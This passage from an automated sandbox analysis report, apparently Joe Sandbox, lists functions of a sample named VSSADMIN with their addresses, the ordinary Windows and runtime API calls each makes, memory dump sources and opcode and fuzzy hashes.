                                                                                                                                                                      • API ID: DeleteErrorFileLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2018770650-0
                                                                                                                                                                      • Opcode ID: 85f758df515426b71bd3396e0c87f7450f551412155cbcefa8c343172ad84c23
                                                                                                                                                                      • Instruction ID: d4926ad4f19582852a5e67f2cd32d7dc07bbaccf79acf8defe075354dccf635b
                                                                                                                                                                      • Opcode Fuzzy Hash: 85f758df515426b71bd3396e0c87f7450f551412155cbcefa8c343172ad84c23
                                                                                                                                                                      • Instruction Fuzzy Hash: 38D01224F19E4391EA1837755CC563811B07F46F78F910637C01EC31D1EE1EE1996101
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C76CC0 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF614C77A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF614C726FB), ref: 00007FF614C77A9A
                                                                                                                                                                      • _findclose.LIBCMT ref: 00007FF614C76F19
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2772937645-0
                                                                                                                                                                      • Opcode ID: e2d0104db5e0f9ebe8afac4b65564d71e0016f36bf532ebb6ddabb36bb2b0c3c
                                                                                                                                                                      • Instruction ID: 00c8cb951e60bbec03345006576054dbfd5067d1d1c42baadcfbb853ce7136a1
                                                                                                                                                                      • Opcode Fuzzy Hash: e2d0104db5e0f9ebe8afac4b65564d71e0016f36bf532ebb6ddabb36bb2b0c3c
                                                                                                                                                                      • Instruction Fuzzy Hash: C2717C52E18EC582E611CB2CC5452FD7370F7AAB68F55E322DB9C52592EF28E2D9C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8B3AC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
                                                                                                                                                                      • Instruction ID: 03ae247b27809fa9dc73bbb45872fdf4a5ba0edb87a9d231745c0654aac005f1
                                                                                                                                                                      • Opcode Fuzzy Hash: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
                                                                                                                                                                      • Instruction Fuzzy Hash: B7419E32908A4787EA24CA19E58127973B1EB97FA1F140232E78EC36D1DF2CE402E750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77230 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fread_nolock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 840049012-0
                                                                                                                                                                      • Opcode ID: ffcdb3f93acbc7b642b0c367d7ec6e2fdf44ecd7681d82c6a1385de564375a62
                                                                                                                                                                      • Instruction ID: b63e5b07194cf5a7f77fe1ab55d2cf8db54b057f4d9f915d165a8fd17a857cbd
                                                                                                                                                                      • Opcode Fuzzy Hash: ffcdb3f93acbc7b642b0c367d7ec6e2fdf44ecd7681d82c6a1385de564375a62
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E21A621B0EA5647FA249B1269847FAA661BF46FE5F885432EE0D87786DE3DF041C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8AE3C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
                                                                                                                                                                      • Instruction ID: bdca0d7cf7522b048a09474cbe80d8adb55b27009ca6eefbae7a56d23ab045d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
                                                                                                                                                                      • Instruction Fuzzy Hash: 1531AE71A18E4385EB11AB59888037C7670AF83FB4F41063BEA2D873D2DF7DA441A714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C887E9 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: 6fb3310ffc3292af0fdd94bbbd9082ba6701090cdfedec6a3c43b4571714928a
                                                                                                                                                                      • Instruction ID: bcc1aa7efde8f78bb98c088f62af5696711bb5bfbb60d52fda648f2d1bfb8ee7
                                                                                                                                                                      • Opcode Fuzzy Hash: 6fb3310ffc3292af0fdd94bbbd9082ba6701090cdfedec6a3c43b4571714928a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B218B32E04A0689EB249F64D4802ED33B0FB45B6CF140A3AD62C87EC6DF78D544CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C854F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                      • Instruction ID: 851e6e4591848b8cd216b5c5358cf1129bc3be11b57677648a27b92bad48828b
                                                                                                                                                                      • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                      • Instruction Fuzzy Hash: 15119621A0CA5381EF609F51948027DA2B0BFD7FA5F444437EA8CC769ADF7CD500A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C9578C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                      • Instruction ID: 7db7c192fe2b76f524c7c5b2199fb77893a77cb47f2a59ddee350370a1325f0f
                                                                                                                                                                      • Opcode Fuzzy Hash: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A217F33A18A4296DB618F18E48036976B0EB96FA8F244236EA5D876D5DF3DD5018B04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7F64C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                      • Instruction ID: eaf90d44afeb166a819dae1377bcbe54cf659c47168e4e3329ca6316d345c132
                                                                                                                                                                      • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                      • Instruction Fuzzy Hash: 2401A561A0CF4342E904DB5299D1079A7A1BB87FF0F084636DE5C97BEADE3CD5018704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C86B74 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                      • Instruction ID: b77321515603504d9b62c82e2a173a6986a4da05f98fdb29e80b7c19908d795b
                                                                                                                                                                      • Opcode Fuzzy Hash: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                      • Instruction Fuzzy Hash: DC113A32A18E4382F3109B14A4C0579B2B5EB86BA4F55453AE69DC77A2DF7CF810AB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8DD70 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF614C8A8E6,?,?,?,00007FF614C89AA3,?,?,00000000,00007FF614C89D3E), ref: 00007FF614C8DDC5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                      • Instruction ID: 2ab543c3322530bba426973a480ad6d1261eab43de51dadf3a8a2d539df9437f
                                                                                                                                                                      • Opcode Fuzzy Hash: 71284afaabaf46e061be5dd41c1ee9242f4793079330fcfb9ee2b8ac464e22c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 12F06D44B09A4782FE585B6198D03B512B05F8BFA4F0C4433C90EC73C2EE1CE892A320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8CAFC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF614C7FE74,?,?,?,00007FF614C81386,?,?,?,?,?,00007FF614C82979), ref: 00007FF614C8CB3A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                      • Instruction ID: bca662125605553ae1b21a038d26fc7c5dfebe982e319e74c95680a684b58faa
                                                                                                                                                                      • Opcode Fuzzy Hash: a7ce567b16112f19067e33b9dc0b94b4c499acd5a025fbf7a889946ef18f26a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 72F05860F0DE8745FE2456A298D027652A05FCAFB4F080732D82EC72C2DE2CE841E120
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C842C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalDeleteSection
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 166494926-0
                                                                                                                                                                      • Opcode ID: c87858656cf315d08959815e89120c56aa562766f4cd24e00349d691214fe034
                                                                                                                                                                      • Instruction ID: 14a2566d7e00c64c72c94caa7bf31536ca23298b02aca0b031a5a7305df29beb
                                                                                                                                                                      • Opcode Fuzzy Hash: c87858656cf315d08959815e89120c56aa562766f4cd24e00349d691214fe034
                                                                                                                                                                      • Instruction Fuzzy Hash: 85F03061E18D0781FB04ABA6D8C137813B0EF97FB5F000037CD0DC72529E1CA4909221
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77360 Relevance: 1.3, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryErrorLastRemove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 377330604-0
                                                                                                                                                                      • Opcode ID: 421877e3912a0793c8b229f65e0544724a19ed071a722aede8cfb3d7b9fe0b6d
                                                                                                                                                                      • Instruction ID: 71d1813f267b5422d99a7772cf2db7702c6980e0ec52edecbe4f97583a7eb25a
                                                                                                                                                                      • Opcode Fuzzy Hash: 421877e3912a0793c8b229f65e0544724a19ed071a722aede8cfb3d7b9fe0b6d
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B418716E1DE8682E6119B28D5512FD2370FBA6B59F54A233DF8D93193EF28B1D8C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FF614C73E10 Relevance: 291.0, APIs: 55, Strings: 111, Instructions: 457libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
